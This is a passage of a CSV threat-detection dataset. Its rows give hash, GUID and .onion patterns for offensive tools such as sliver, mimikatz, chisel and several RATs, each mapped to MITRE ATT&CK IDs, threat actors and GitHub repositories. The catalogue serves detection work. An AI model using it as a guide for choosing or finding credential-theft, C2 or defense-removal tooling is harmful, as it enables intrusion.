adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32354" "*a2d9e1816e8f4f6a4bbb1a0b19c0805b1a2b221615d5038740a5903be8ed7cc3*",".{0,1000}a2d9e1816e8f4f6a4bbb1a0b19c0805b1a2b221615d5038740a5903be8ed7cc3.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","32355" "*a2dbso6dijaqsmut36r6y4nps4cwivmfog5bpzf6uojovce6f3gl36id.onion*",".{0,1000}a2dbso6dijaqsmut36r6y4nps4cwivmfog5bpzf6uojovce6f3gl36id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","32356" "*a2f2705bdc56aa0bde9c27639f9d8d430fe5151140a85feac95ed6537655fbc1*",".{0,1000}a2f2705bdc56aa0bde9c27639f9d8d430fe5151140a85feac95ed6537655fbc1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32358" "*a306e29eb09842d5accb058f5dd939c9466ae664c1fe9915100c15e0a581b1f0*",".{0,1000}a306e29eb09842d5accb058f5dd939c9466ae664c1fe9915100c15e0a581b1f0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32360" "*a3082e1d9f46b7d8878e3a87a0324eabff9731c12e8637e0a714929938a99177*",".{0,1000}a3082e1d9f46b7d8878e3a87a0324eabff9731c12e8637e0a714929938a99177.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - 
TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","32361" "*a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0*",".{0,1000}a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32362" "*A315E53B-397A-4074-B988-535A100D45DC*",".{0,1000}A315E53B\-397A\-4074\-B988\-535A100D45DC.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#GUIDproject","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","32363" "*a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7*",".{0,1000}a315f75d50a2c54a6d1bb84cca077e6894870d8a1e60010ffd1307a295c8b9f7.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","32364" "*A318BEE3-2BDB-41A1-BE56-956774BBC12B*",".{0,1000}A318BEE3\-2BDB\-41A1\-BE56\-956774BBC12B.{0,1000}","offensive_tool_keyword","PrivFu","inspect token 
information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32365" "*a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f*",".{0,1000}a324c19c7df7c2c63f4fc17bc8e1554e4261a27c18cd68c47cc08602f480d60f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32367" "*a32580495d4c71174e41935bf681c053aef15993a80c663f224790588b713742*",".{0,1000}a32580495d4c71174e41935bf681c053aef15993a80c663f224790588b713742.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","32368" "*a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715*",".{0,1000}a32cdeddc7deb6d2ac210ec304930da4e9c6763975d72685fd7108ad48883715.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","32369" "*a336f517-bca9-465f-8ff8-2756cfd0cad9*",".{0,1000}a336f517\-bca9\-465f\-8ff8\-2756cfd0cad9.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows 
(RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32370" "*a337eb11ea8a12ec4bfbb0d1a3f939fe6105dea0836b5f9a037b67fa4dbd0b40*",".{0,1000}a337eb11ea8a12ec4bfbb0d1a3f939fe6105dea0836b5f9a037b67fa4dbd0b40.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32371" "*a33909ee705e9f06d27bbca6b33048e5ce0c7caeb14281b726e0c5a32d8c3a42*",".{0,1000}a33909ee705e9f06d27bbca6b33048e5ce0c7caeb14281b726e0c5a32d8c3a42.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","32372" "*a33b3ce0aea96a0cd84e504637a7814b713bddbc0dba96765e6a1a0f6c1375db*",".{0,1000}a33b3ce0aea96a0cd84e504637a7814b713bddbc0dba96765e6a1a0f6c1375db.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32373" "*a34169885cc3ce7676197b63d907f44dbd7312e33498f7c6701e3d81af69154a*",".{0,1000}a34169885cc3ce7676197b63d907f44dbd7312e33498f7c6701e3d81af69154a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32374" "*a352a6b52e5433a2dc19445287db1537ae6385dc6e1b2b11f53c222b14aae75d*",".{0,1000}a352a6b52e5433a2dc19445287db1537ae6385dc6e1b2b11f53c222b14aae75d.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","32381" "*a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd*",".{0,1000}a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32382" "*a3596035af9ac517f109f920bde188f2bc80ac1c5b6f282187d8cd5aa5e2e4ea*",".{0,1000}a3596035af9ac517f109f920bde188f2bc80ac1c5b6f282187d8cd5aa5e2e4ea.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - 
T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32384" "*a36223683b1c817d0682ecbee3f3c2d8c60259253dc70969110aed4a3bb4ccfa*",".{0,1000}a36223683b1c817d0682ecbee3f3c2d8c60259253dc70969110aed4a3bb4ccfa.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32385" "*a36e3489d4317d70fd2cb100020b0c53d575988b790ec33c4c4d204e5e834016*",".{0,1000}a36e3489d4317d70fd2cb100020b0c53d575988b790ec33c4c4d204e5e834016.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","#filehash","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","32386" "*a36ffb4f22598b5e983ef16251df49deb94ad0c41a8a1768503efe4d7e16ea40*",".{0,1000}a36ffb4f22598b5e983ef16251df49deb94ad0c41a8a1768503efe4d7e16ea40.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","32387" "*a373aea915dda9f79a2b5467a45a9457cb8595b756ffd56b98c877733e0f14b2*",".{0,1000}a373aea915dda9f79a2b5467a45a9457cb8595b756ffd56b98c877733e0f14b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32389" "*a3758ea5e899a151d3f5055938dcd9db6aa28c163c2022975f85db8700d48d60*",".{0,1000}a3758ea5e899a151d3f5055938dcd9db6aa28c163c2022975f85db8700d48d60.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32390" "*a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795*",".{0,1000}a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32392" "*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 
","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#GUIDproject","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","32393" "*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#GUIDproject","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","32394" "*a38f6ecc6230b87a0da055351528416f5150c6ec5e1b505043883a142cd36f14*",".{0,1000}a38f6ecc6230b87a0da055351528416f5150c6ec5e1b505043883a142cd36f14.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32395" "*a39094b4805dbd909a8450973d690313091cb300d184c8633b0a913942d0fb69*",".{0,1000}a39094b4805dbd909a8450973d690313091cb300d184c8633b0a913942d0fb69.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","32396" 
"*a398655a-d83f-46bf-8173-3ad16260d970*",".{0,1000}a398655a\-d83f\-46bf\-8173\-3ad16260d970.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#GUIDproject","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","32398" "*a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325*",".{0,1000}a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32399" "*a3a0bb972adf5e3a1bcd6684e0569ce704cd46a82570a7fbeb0c8ae8c6dfd65f*",".{0,1000}a3a0bb972adf5e3a1bcd6684e0569ce704cd46a82570a7fbeb0c8ae8c6dfd65f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32400" "*a3acaab0bbd69e3cc51cfaf700d2b320fbcdbdb8afa55b438fc455058fcb9a21*",".{0,1000}a3acaab0bbd69e3cc51cfaf700d2b320fbcdbdb8afa55b438fc455058fcb9a21.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32402" 
"*a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296*",".{0,1000}a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32403" "*a3af5883965557d84c10d70c96b4f8c559562bf6428cdb10893277918acef863*",".{0,1000}a3af5883965557d84c10d70c96b4f8c559562bf6428cdb10893277918acef863.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32404" "*a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3*",".{0,1000}a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32405" "*a3b70c73e64ed076672aa098f10baaa91dea2c33283c4aea33a260f9de287cda*",".{0,1000}a3b70c73e64ed076672aa098f10baaa91dea2c33283c4aea33a260f9de287cda.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy 
server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32406" "*a3bf479adb8b6bd523617d51a5c872f86d0a1d2104e63749830b2bd254567d80*",".{0,1000}a3bf479adb8b6bd523617d51a5c872f86d0a1d2104e63749830b2bd254567d80.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","32407" "*a3bf89c831592b1dd3a093f68a4d4bbc2fa6c4ebb6f2128808d4aa67f81b9269*",".{0,1000}a3bf89c831592b1dd3a093f68a4d4bbc2fa6c4ebb6f2128808d4aa67f81b9269.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32408" "*A3C83F57-6D8F-453A-9559-0D650A95EB21*",".{0,1000}A3C83F57\-6D8F\-453A\-9559\-0D650A95EB21.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#GUIDproject","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","32409" "*a3ca8d72edaf4ffb84a38e88a31f9e537d7d7b76f7cc7966583c7b4b4a811c74*",".{0,1000}a3ca8d72edaf4ffb84a38e88a31f9e537d7d7b76f7cc7966583c7b4b4a811c74.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","32410" "*a3cb4dc05b5c42059a88e8bce99878c5228bb139b7bd3e2b36588d9ce4968141*",".{0,1000}a3cb4dc05b5c42059a88e8bce99878c5228bb139b7bd3e2b36588d9ce4968141.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","32411" "*a3db26ef5003ac7b18f143dd6fe3c5ab789cd6cbc908f7cf572d006d9f8bd133*",".{0,1000}a3db26ef5003ac7b18f143dd6fe3c5ab789cd6cbc908f7cf572d006d9f8bd133.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - 
T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32412" "*a3db95daa151cb6ab640f368e1850108099cf94eee2bd2c3fd2789ee83bbcb71*",".{0,1000}a3db95daa151cb6ab640f368e1850108099cf94eee2bd2c3fd2789ee83bbcb71.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32413" "*a3e3b811f35d32e87feb85a1a1d0eddc727d712702c584dce1ef0a0878cd1cf2*",".{0,1000}a3e3b811f35d32e87feb85a1a1d0eddc727d712702c584dce1ef0a0878cd1cf2.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32414" "*a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5*",".{0,1000}a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - 
APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32417" 